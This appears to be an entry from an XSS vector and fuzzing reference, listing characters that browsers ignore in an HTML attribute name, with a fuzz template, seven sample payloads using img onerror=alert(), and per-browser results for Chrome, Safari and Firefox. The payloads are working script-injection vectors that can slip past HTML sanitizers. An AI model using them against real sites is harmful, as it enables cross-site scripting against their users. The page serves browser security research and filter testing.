Characters ignored in an attribute name

Chrome logo 7
Safari logo 7
Firefox logo 7

This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.

Created by: hackvertor

Created on: Tuesday, May 28, 2024 at 7:38:17 PM

Updated on: Wednesday, December 11, 2024 at 8:38:37 PM

Vector type: XSS

Vector charset: UTF-8

Template used:
<div $[chr]="><img src=x:x onerror=log($[i])>"></div>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<div 	="><img src=x:x onerror=alert(9)>"></div>
<div 
="><img src=x:x onerror=alert(10)>"></div>
<div ="><img src=x:x onerror=alert(12)>"></div>
<div 
="><img src=x:x onerror=alert(13)>"></div>
<div  ="><img src=x:x onerror=alert(32)>"></div>
<div /="><img src=x:x onerror=alert(47)>"></div>
<div >="><img src=x:x onerror=alert(62)>"></div>

Fuzz results

Chrome logo
Chrome 125.0.0.0 Unknown Unknown

Updated

Tue May 28 2024
Found 7 results
Loading...
Safari logo
Safari 17.4 Unknown Unknown

Updated

Tue May 28 2024
Found 7 results
Loading...
Firefox logo
Firefox 126.0 Unknown Unknown

Updated

Tue May 28 2024
Found 7 results
Loading...
Safari logo
Safari 17.5 mobile iOS 17.5.1

Updated

Fri Jun 07 2024
Found 7 results
Loading...